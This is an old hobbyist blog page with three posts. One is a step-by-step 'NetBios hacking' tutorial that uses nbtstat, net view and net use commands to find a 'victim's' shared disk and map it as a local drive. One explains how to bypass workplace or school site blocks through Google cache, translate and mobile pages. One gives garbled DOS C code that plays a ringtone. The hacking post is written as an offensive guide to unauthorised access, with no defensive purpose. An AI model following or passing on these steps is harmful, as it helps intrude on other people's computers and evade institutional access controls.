Friday, December 21, 2007

cool tricks


Netbios hacking
NetBios hacking for windows 95/98/ME/NT/XPStep 1Get a IP (range) scanner. (superscanner is a fast one).Scan the victim's ip on TCP/IP port 139Step 2Open a dos promptDo this by going to start/runenter command.com and press okthis is what you see:c:windows>This is what you need to type down:Replace 255.255.255.255 with the victims IP address.c:windows>nbtstat -a 255.255.255.255If you see this your in:NetBIOS Remote Machine Name TableName Type Status---------------------------------------------------------------user<00> UNIQUE Registeredworkgroup <00> GROUP Registereduser <03> UNIQUE Registereduser <20> UNIQUE RegisteredMAC Address = xx-xx-xx-xx-xx-xx---------------------------------------------------------------If you don't get the number <20>.The victim disabled the File And Printer Sharing, find a another victim.Step 3type down:c:windows>net view 255.255.255.255if the output is like this:Shared resources at 255.255.255.255ComputerNameGoesHereSharename Type Used as Comment------------------------------------------------------------CDISK Disk xxxxx xxxxxThe command completed successfully."DISK" shows that the victim is sharing a Disk named as CDISKStep 4type down:you can replace x: by anything letter yopu want but not your own drive letters.CDISK is the name of the shared harddrive.c:windows>net use x: 255.255.255.255CDISKIf the command is successful we will get the confirmation.The command was completed successfulllyNow open windows explorer or just double click on the My Computer icon on yourdesktop and you will see a new network drive X:> . Now your are a small time hacker.Good luck.
Posted by BAS at 4:06 PM 3 comments
Labels: , , , , , , , , ,
Saturday, December 15, 2007

How to use Google as proxy
Many jobs and schools (countries?) block access to certain sites. However, it is very difficult for anybody to block access to google. By using google with either of these two methods, you can gain access to blocked sites very easily.Blocked web site, huh? Need a proxy?I am not a big fan of chasing free, open proxies all over the place. I use google instead. Here I describe what I believe is an uncommon way for bypassing blocked sites using google.1:The first and most common way of using google to bypass blocked sites is just to search for the site and then clicked the "cached" link that appears on google. Easy, simple, and frequently works for static information.2:Passing the site through google translator works well as well. Here's the URL to use:Code:http://www.google.com/translate?langpair=enen&u=www.blockedsite.com(where blockedsite.com is the site that you wish to visit)This translates the site from english to english and works because the ip address will appear as google instead of you. Here's a link to tech-recipes passed through the translator as an example. You can actually do this with any langpair. Change enen in the URL above to spanish by using eses and it still works.3:Unique method that I have not seen described before is to search through google mobile. Google mobile will "convert as you go" very similiar to the translation method above.Just search for your site with google mobile and click on the link it provides. Here's is tech-recipes brought up through google mobile search. Once again, this will allow you to bypass any blocks because the IP request comes from google not for you.Like the translation method above, google will continue to "proxy" as you continue to visit links through the site.And ya it is also useful to retrive some information from net which is currently not available.Somedays ago softarchives.net was down and I wanted to download one software urgently from there so I searched google for site:softarchive.net software name and I saw the link in google search.I opened cached page of that page and got the rs link so this trick is very useful in such conditions
Posted by BAS at 10:04 AM 0 comments
Labels: , , , , ,
Thursday, December 13, 2007

C CODE TO GENERATE AIRTEL TUNE
HEADERS FILES ARE DOS.H AND STDIO.H#include#includefloat main(void){float A,Bb,D,G,F;A = 440;G = 780;Bb = 461;D = 586;F = 687;sound(G);delay(500);nosound();sound(G);delay(250);nosound();sound(G);delay(250);nosound();sound(G);delay(500);nosound();sound(2*D);delay(500);nosound();sound(2*A);delay(250);nosound();sound(2*Bb);delay(250);nosound();sound(2*A);delay(250);nosound();sound(G);delay(250);nosound();sound(F);delay(500);nosound();sound(2*A);delay(500);nosound();sound(G);delay(250);nosound();sound(2*A);delay(250);nosound();sound(G);delay(250);nosound();sound(F);delay(250);sound(G);delay(250);sound(2*A);delay(250);sound(2*Bb);delay(500);sound(2*A);delay(500);sound(G);delay(250);sound(F);delay(250);sound(D);delay(500);nosound();//end 1sound(G);delay(500);nosound();sound(G);delay(250);nosound();sound(G);delay(250);nosound();sound(G);delay(500);nosound();sound(2*D);delay(500);nosound();sound(2*A);delay(250);nosound();sound(2*Bb);delay(250);nosound();sound(2*A);delay(250);nosound();sound(G);delay(250);nosound();sound(F);delay(500);nosound();sound(2*A);delay(500);nosound();sound(G);delay(250);nosound();sound(2*A);delay(250);nosound();sound(G);delay(250);nosound();sound(F);delay(250);sound(G);delay(250);sound(2*A);delay(250);sound(2*Bb);delay(500);sound(2*A);delay(500);sound(G);delay(250);sound(F);delay(250);sound(D);delay(500);nosound();//end 2sound(2*A);delay(250);nosound();sound(G);delay(250);nosound();sound(F);delay(250);sound(G);delay(250);sound(2*A);delay(250);sound(2*Bb);delay(500);sound(2*A);delay(500);sound(G);delay(250);sound(F);delay(250);sound(D);delay(500);nosound();sound(2*A);delay(250);nosound();sound(G);delay(250);nosound();sound(F);delay(250);sound(G);delay(250);sound(2*A);delay(250);sound(2*Bb);delay(500);sound(2*A);delay(500);sound(G);delay(250);sound(F);delay(250);sound(D);delay(500);nosound();return 0;}

No comments: